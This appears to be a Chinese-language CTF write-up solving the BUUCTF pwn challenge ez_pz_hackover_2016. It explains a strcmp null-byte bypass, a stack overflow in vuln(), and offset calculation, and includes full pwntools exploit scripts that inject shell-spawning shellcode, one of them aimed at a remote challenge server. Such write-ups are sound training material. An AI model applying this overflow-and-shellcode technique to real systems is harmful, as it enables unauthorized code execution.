本文解析了一道PWN挑战,涉及输入验证绕过和地址计算。作者详细介绍了如何利用fgets溢出漏洞,通过计算输入点与EBP的偏移量找到shellcode地址,最终实现代码执行。
[PWN] BUUCTF ez_pz_hackover_2016 1
解题分析
按照惯例先checksec一下,除了RELRO,其他都没开
执行,观察程序运行逻辑,给出一个地址,然后让我们输入name
32IDA打开程序,观察main函数,header()只是打印图形,chall()才是关键函数
在chall中先输出s的地址,之后fgets接收一个不大于1023(0x3ff)的字符到s的缓冲区中,但s的缓冲区有0x40c个字节,所以这里不能进行溢出,紧接着利用strcmp函数把输入的字符和crashme比较,两者不相同,则程序结束,若相同则进入vuln()函数
在vuln()函数中,把参数s中拷贝0x400个字节到dest中,但是dest的大小只有0x32个字节,所以存在溢出漏洞
shift+f12查看程序里的字符串,没有看到特殊的函数,而且又没有开NX所以可以构造shellcode
漏洞利用
通过fgets拷贝shellcode到s的缓冲区中,执行vuln函数后让dest造成溢出,跳转到栈上的shellcode执行,这里的难点是怎么绕过 if ( !result )来执行vuln()函数和计算出shellcode的地址
payload分析
1.绕过if,来执行vuln()
strcmp函数
int strcmp(const char *s1,const char *s2);
从左到右逐个字符进行比较(ASCII值),直到出现不同的字符或遇到’\0’为止。
所以在fgets中即使输入了crashme,若没有’\0’,比较会继续进行下去,这样就无法绕过if了,所以应该输入 ‘crashme\x00’ 可以绕过这个if检查
注意若在运行程序时输入字符,按下回车键后,也会产生一个\n来占据s的空间
2.计算出shellcode的地址
程序会打印出s缓冲区的地址,所以只要知道了s缓冲区和shellcode地址的相对偏移量,那么就可以计算出shellcode的地址了
输入点与ebp距离的计算方法
#coding=utf-8
#!/usr/bin/env python
from pwn import * #导入pwntools中的pwn包的所有内容
context.terminal = ['terminator','-x','sh','-c']
context.log_level='debug'
# p=remote('node3.buuoj.cn','27274')
p=process('./ez_pz_hackover_2016')
# gdb.attach(p)
gdb.attach(p,'b *0x8048600')
p.recvuntil('crash: ')
stack_addr=int(p.recv(10),16)
log.success('stack_addr==>'+hex(stack_addr))
payload='crashme\x00'+'aaaaaa'#前面的crashme\x00绕过if判断
p.sendline(payload)
pause()
0x8048600是Nop指令的位置,在这里下断点是为了查看vuln()执行完后准备返回前堆栈的状态(crashme被拷贝进dest后堆栈状态)
第一种
输入的crashme与ebp的地址
两者之间的距离0x16(22)
第二种
c,r的ASCLL分别是63,72。所以在图中0x20对应00,0x21对应00,0x22对应63( c ),0x23对应72( r ),所以ebp与输入点的距离
0x38-0x22=0x16(22)
则有
payload='crashme\x00'+'a'*(0x16-8+4) #-8是 ‘crashme\x00’ 占用了8字节,+4是用来覆盖ebp的
泄露的地址与shellcode的偏移量
前面打印出了s的地址0xffc014dc
通过脚本来寻找两者偏移
#coding=utf-8
#!/usr/bin/env python
from pwn import * #导入pwntools中的pwn包的所有内容
context.terminal = ['terminator','-x','sh','-c']
context.log_level='debug'
# p=remote('node3.buuoj.cn','27274')
p=process('./ez_pz_hackover_2016')
# gdb.attach(p)
gdb.attach(p,'b *0x8048600')
p.recvuntil('crash: ')
stack_addr=int(p.recv(10),16)
log.success('stack_addr==>'+hex(stack_addr))
payload = 'crashme\x00' + 'a'*(0x16-8+4) # 前面的crashme\x00绕过if判断
payload += p32(0) # 返回地址shellcode,但现在未知,故随意填充数据
payload += asm(shellcraft.sh()) # 利用pwntools自动生成shellcode
p.sendline(payload)
pause()
p.interactive()
search jhh 寻找shellcode在栈上的起始地址
计算两者偏移
0xffc014dc-0xffc014c0=0x1c(28)
最后有
payload = 'crashme\x00' + 'a'*(0x16-8+4) # 前面的crashme\x00绕过if判断
payload += p32(stack_addr-0x1c) # 返回地址位置,随意填充数据
payload += asm(shellcraft.sh()) #利用pwntools自动生成
payload
#coding=utf-8
#!/usr/bin/env python
from pwn import * #导入pwntools中的pwn包的所有内容
context.terminal = ['terminator','-x','sh','-c']
context.log_level='debug'
p=remote('node3.buuoj.cn','26490')
# p=process('./ez_pz_hackover_2016')
# gdb.attach(p)
# gdb.attach(p,'b *0x8048600')
p.recvuntil('crash: ')
stack_addr=int(p.recv(10),16)
log.success('stack_addr==>'+hex(stack_addr))
payload = 'crashme\x00' + 'a'*(0x16-8+4) # 前面的crashme\x00绕过if判断
payload += p32(stack_addr-0x1c) # 返回地址位置,随意填充数据
payload += asm(shellcraft.sh()) #利用pwntools自动生成
p.sendline(payload)
# pause()
p.interactive()
Get!
参考Wp
https://blog.youkuaiyun.com/mcmuyanga/article/details/108964698
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
